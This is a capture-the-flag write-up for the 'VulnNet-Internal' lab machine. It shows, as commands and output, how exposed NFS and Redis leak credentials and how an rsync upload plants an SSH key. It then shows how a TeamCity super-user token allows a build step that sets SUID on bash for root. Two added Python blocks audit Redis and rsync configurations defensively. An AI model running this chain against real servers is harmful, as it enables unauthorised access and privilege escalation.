# Write-up for VulnNet-Internal

## Basic Enumeration

### nmap scan

Using the command `nmap -v -sC -sV -p- 10.10.75.134` we get

```
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_  256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp   open     rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35973/tcp   mountd
|   100005  1,2,3      50743/udp   mountd
|   100005  1,2,3      50821/tcp6  mountd
|   100005  1,2,3      60228/udp6  mountd
|   100021  1,3,4      33804/udp6  nlockmgr
|   100021  1,3,4      35968/udp   nlockmgr
|   100021  1,3,4      38965/tcp6  nlockmgr
|   100021  1,3,4      44305/tcp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open     rsync       (protocol version 31)
2049/tcp  open     nfs_acl     3 (RPC #100227)
6379/tcp  open     redis       Redis key-value store
9090/tcp  filtered zeus-admin
35973/tcp open     mountd      1-3 (RPC #100005)
39613/tcp open     mountd      1-3 (RPC #100005)
42041/tcp open     java-rmi    Java RMI
44305/tcp open     nlockmgr    1-4 (RPC #100021)
49833/tcp open     mountd      1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2021-05-26T20:17:39+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-26T18:17:39
|_  start_date: N/A
```

## First Flag

Enumerating SMB with `smbclient -L 10.10.75.134`:

```
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	shares          Disk      VulnNet Business Shares
	IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
```

Let's check out what's inside the `shares` folder: `smbclient //10.10.75.134/shares`

```
smb: \> ls
  .                                   D        0  Tue Feb  2 14:50:09 2021
  ..                                  D        0  Tue Feb  2 14:58:11 2021
  temp                                D        0  Sat Feb  6 17:15:10 2021
  data                                D        0  Tue Feb  2 14:57:33 2021

		11309648 blocks of size 1024. 3277568 blocks available
smb: \> cd temp
smb: \temp\> ls
  .                                   D        0  Sat Feb  6 17:15:10 2021
  ..                                  D        0  Tue Feb  2 14:50:09 2021
  services.txt                        N       38  Sat Feb  6 17:15:09 2021

		11309648 blocks of size 1024. 3277564 blocks available
smb: \temp\> get services.txt
getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
```

So we got our first flag: **THM{0a09d51e488f5fa105d8d866a497440a}**

## Second flag

We know there is **NFS** on the machine (the rpcbind listing on port 111 shows it), so let's check that out.

`mkdir mount`

`sudo mount -t nfs 10.10.75.134: mount`

Upon examination we find the file `./mount/opt/conf/redis/redis.conf`. Using grep on the file, `grep -r pass redis.conf`:

```
# 2) No password is configured.
# If the master is password protected (using the "requirepass" configuration
# masterauth <master-password>
requirepass "B65Hx562F@ggAZ@F"
# resync is enough, just passing the portion of data the slave missed while
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
# requirepass foobared
```

Now we can connect to the Redis server with the password found, **B65Hx562F@ggAZ@F**:

`redis-cli -h 10.10.75.134 -a "B65Hx562F@ggAZ@F"`

```
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.75.134:6379> keys *
1) "internal flag"
2) "marketlist"
3) "tmp"
4) "int"
5) "authlist"
10.10.75.134:6379> get "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"
10.10.75.134:6379> 
```

We have our second flag: **THM{ff8e518addbbddb74531a724236a8221}**

On googling I found that Redis keys hold different value types, and `get` only works on string keys, so a list key has to be read with `lrange` [LINK](https://stackoverflow.com/questions/37953019/wrongtype-operation-against-a-key-holding-the-wrong-kind-of-value-php)

```
10.10.75.134:6379> get "authlist"
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.75.134:6379> lrange "authlist" 1 10
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
```

On decoding the base64 string we get

> Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

### Examining rsync

Now we try to connect to the rsync server:

```
shivam@ubuntu:~/ctf/tryhackme/vuln$ rsync --list-only rsync://10.10.75.134
files          	Necessary home interaction
shivam@ubuntu:~/ctf/tryhackme/vuln$ rsync --list-only rsync://rsync-connect@10.10.75.134/files
Password: 
drwxr-xr-x          4,096 2021/02/01 18:21:14 .
drwxr-xr-x          4,096 2021/02/06 18:19:29 sys-internal
shivam@ubuntu:~/ctf/tryhackme/vuln$ rsync --list-only rsync://rsync-connect@10.10.75.134/files/sys-internal/
Password: 
drwxr-xr-x          4,096 2021/02/06 18:19:29 .
-rw-------             61 2021/02/06 18:19:28 .Xauthority
lrwxrwxrwx              9 2021/02/01 19:03:19 .bash_history
-rw-r--r--            220 2021/02/01 18:21:14 .bash_logout
-rw-r--r--          3,771 2021/02/01 18:21:14 .bashrc
-rw-r--r--             26 2021/02/01 18:23:18 .dmrc
-rw-r--r--            807 2021/02/01 18:21:14 .profile
lrwxrwxrwx              9 2021/02/02 19:42:29 .rediscli_history
-rw-r--r--              0 2021/02/01 18:24:03 .sudo_as_admin_successful
-rw-r--r--             14 2018/02/13 00:39:01 .xscreensaver
-rw-------          2,546 2021/02/06 18:19:35 .xsession-errors
-rw-------          2,546 2021/02/06 17:10:13 .xsession-errors.old
-rw-------             38 2021/02/06 17:24:25 user.txt
drwxrwxr-x          4,096 2021/02/02 14:53:00 .cache
drwxrwxr-x          4,096 2021/02/01 18:23:57 .config
drwx------          4,096 2021/02/01 18:23:19 .dbus
drwx------          4,096 2021/02/01 18:23:18 .gnupg
drwxrwxr-x          4,096 2021/02/01 18:23:22 .local
drwx------          4,096 2021/02/01 19:07:15 .mozilla
drwxrwxr-x          4,096 2021/02/06 17:13:14 .ssh
drwx------          4,096 2021/02/02 16:46:16 .thumbnails
drwx------          4,096 2021/02/01 18:23:21 Desktop
drwxr-xr-x          4,096 2021/02/01 18:23:22 Documents
drwxr-xr-x          4,096 2021/02/01 19:16:46 Downloads
drwxr-xr-x          4,096 2021/02/01 18:23:22 Music
drwxr-xr-x          4,096 2021/02/01 18:23:22 Pictures
drwxr-xr-x          4,096 2021/02/01 18:23:22 Public
drwxr-xr-x          4,096 2021/02/01 18:23:22 Templates
drwxr-xr-x          4,096 2021/02/01 18:23:22 Videos
```

## Third flag (user flag)

We know that the machine has an SSH port open. We can push a copy of our local machine's public key to the server using rsync and then connect to it using SSH.

`cp ~/.ssh/id_rsa.pub authorized_keys`

The public key goes on the server in the **authorized_keys** file, under the **.ssh** folder in the home directory.

`rsync authorized_keys rsync://rsync-connect@10.10.75.134/files/sys-internal/.ssh`

Now we can connect to the machine using SSH.
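Looking back at the Redis section: the chain started with a live `requirepass` in a config exposed over NFS and a base64-encoded password sitting in the `authlist` key. As an added defensive example (not part of the write-up), here is a small Python secret scanner for exactly those two artefacts: it reports active credential directives in a redis.conf and decodes base64 list entries to flag ones that mention a credential, masking the values so the report does not re-leak them. The sample config and list entries are constructed to mirror the page's output; `mask`, `scan_redis_conf` and `scan_list_entries` are names chosen here.

```python
import base64
import re

# Credential directives in redis.conf; on this box the live one was readable
# through an unauthenticated NFS export. Samples below are constructed.
SENSITIVE_DIRECTIVES = ("requirepass", "masterauth")
KEYWORDS = ("password", "passwd", "secret", "token")
SAMPLE_CONF = """# 2) No password is configured.
# masterauth <master-password>
port 6379
requirepass "S3cretPass"
# requirepass foobared
"""
SAMPLE_AUTHLIST = [
    base64.b64encode(b"rsync://rsync-connect@127.0.0.1 with password S3cretPass\n").decode(),
    base64.b64encode(b"just a note\n").decode(),
    "not base64!!",  # opaque value that must not crash the scan
]

def mask(secret):
    """Keep a two-character hint so reports do not re-leak the secret."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)

def scan_redis_conf(conf_text):
    """Return active (uncommented) credential directives with masked values."""
    findings = []
    for lineno, line in enumerate(conf_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # '# requirepass foobared' is documentation, not config
        directive, _, value = stripped.partition(" ")
        if directive.lower() in SENSITIVE_DIRECTIVES:
            findings.append({"line": lineno, "directive": directive.lower(),
                             "value": mask(value.strip().strip('"'))})
    return findings

def scan_list_entries(entries):
    """Decode base64 list values (like 'authlist') and flag credential text."""
    findings = []
    for idx, entry in enumerate(entries):
        try:
            text = base64.b64decode(entry, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 text: leave binary or opaque values alone
        hit = next((k for k in KEYWORDS if k in text.lower()), None)
        if hit:  # redact the value after the keyword before storing the finding
            redacted = re.sub(rf"({hit}\s+)(\S+)",
                              lambda m: m.group(1) + mask(m.group(2)), text, flags=re.I)
            findings.append({"index": idx, "keyword": hit, "text": redacted.strip()})
    return findings
```

Run against `SAMPLE_CONF` and `SAMPLE_AUTHLIST` it flags the `requirepass` line and the first list entry only; in practice the same functions would be fed the mounted config and the output of `lrange`.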
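The rsync module above accepted an upload straight into a user's `~/.ssh`. As an added example, and not the box's actual rsyncd.conf (the write-up never shows it), the Python below parses a constructed weak module of the kind that would explain what we saw, beside a hardened form of the same module, and reports the settings that grant more than read access to a home directory. `parse_rsyncd`, `is_true` and `audit_rsyncd` are names chosen here; the option names are standard rsyncd.conf ones.

```python
import configparser

# Constructed rsyncd.conf modules (not the box's real file): the first matches
# what the write-up observed, an authenticated module over home directories
# that accepts uploads; the second is the hardened form of the same module.
WEAK_CONF = """[files]
path = /home
comment = Necessary home interaction
read only = no
auth users = rsync-connect
secrets file = /etc/rsyncd.secrets
"""
HARDENED_CONF = """[files]
path = /srv/rsync/files
comment = Necessary home interaction
read only = yes
list = no
auth users = rsync-connect
secrets file = /etc/rsyncd.secrets
uid = nobody
gid = nogroup
hosts allow = 10.0.0.0/8
"""

def parse_rsyncd(text):
    """Map each [module] to its options (rsyncd.conf is ini-style)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return {name: dict(cp[name]) for name in cp.sections()}

def is_true(value):
    return value.strip().lower() in ("yes", "true", "1")

def audit_rsyncd(text):
    """Return (module, issue) pairs for settings that let a remote user
    read or write more than the module's purpose needs."""
    issues = []
    for name, opts in parse_rsyncd(text).items():
        path = opts.get("path", "")
        # rsyncd defaults to read only = yes, so only an explicit no opens uploads.
        if "read only" in opts and not is_true(opts["read only"]):
            issues.append((name, "writable module"))
            if path == "/" or path.startswith("/home"):
                issues.append((name, "writable path covers home directories (.ssh/authorized_keys)"))
        if "auth users" not in opts:
            issues.append((name, "no auth users: anonymous access"))
        if opts.get("uid", "nobody").strip() in ("root", "0"):
            issues.append((name, "daemon writes as root"))
        if "hosts allow" not in opts:
            issues.append((name, "no hosts allow restriction"))
    return issues
```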
### user shell

`ssh sys-internal@10.10.75.134`

```
sys-internal@vulnnet-internal:~$ ls
Desktop  Downloads  Pictures  Templates  Videos
Documents  Music  Public  user.txt
sys-internal@vulnnet-internal:~$ cat user.txt
THM{da7c20696831f253e0afaca8b83c07ab}
```

The user flag is: **THM{da7c20696831f253e0afaca8b83c07ab}**

## Final flag (root flag)

While goofing around I found a folder named **TeamCity** under the root directory. I also checked which ports are open locally:

```
sys-internal@vulnnet-internal:~$ ss -tno
State      Recv-Q Send-Q Local Address:Port              Peer Address:Port
ESTAB      0      36     10.10.75.134:22                 10.18.118.144:35422   timer:(on,536ms,0)
ESTAB      0      0      10.10.75.134:2049               10.18.118.144:907
ESTAB      0      0      [::ffff:127.0.0.1]:55839        [::ffff:127.0.0.1]:8111
CLOSE-WAIT 1      0      [::ffff:127.0.0.1]:43969        [::ffff:127.0.0.1]:8111
ESTAB      0      0      [::ffff:127.0.0.1]:8111         [::ffff:127.0.0.1]:55839
```

Let's set up port forwarding to see what is listening on 8111:

`ssh sys-internal@10.10.75.134 -L 8111:127.0.0.1:8111`

On visiting http://localhost:8111/ we get a TeamCity login page. Clicking *Log in as a Super user* redirects us to a page that asks for an authentication token. The JetBrains docs say:

> The authentication token is automatically generated on every server start. The token is printed in the server console and [`teamcity-server.log`](https://www.jetbrains.com/help/teamcity/2020.2/teamcity-server-logs.html) under the `TeamCity\logs` directory (search for the "Super user authentication token" text). The line is printed on the server start and on any login page submit without a username specified.

I first entered a garbage value (so the server would print the line again) and then looked for the token under **/TeamCity/logs**.

```
sys-internal@vulnnet-internal:/TeamCity/logs$ grep -r token 2>/dev/null
catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 6040920619184437384 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 6040920619184437384 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 6040920619184437384 (use empty username with the token as the password to access the server)
```

On checking, the actual (current) token is the most recent one, **6040920619184437384**.

With that we get super user access to TeamCity. Now I can create a new project and open the **Build Steps** option. It offers several types of build step; I selected **Command Line**, since we are after privilege escalation. It gives a text editor to insert commands. I inserted `chmod u+s /bin/bash` to set the SUID bit on bash, saved it and hit `Run` in the top right. Now, as the sys-internal user, we can run `/bin/bash -p`... and that's it, we have a root shell.

Hence the final flag is: **THM{e8996faea46df09dba5676dd271c60bd}**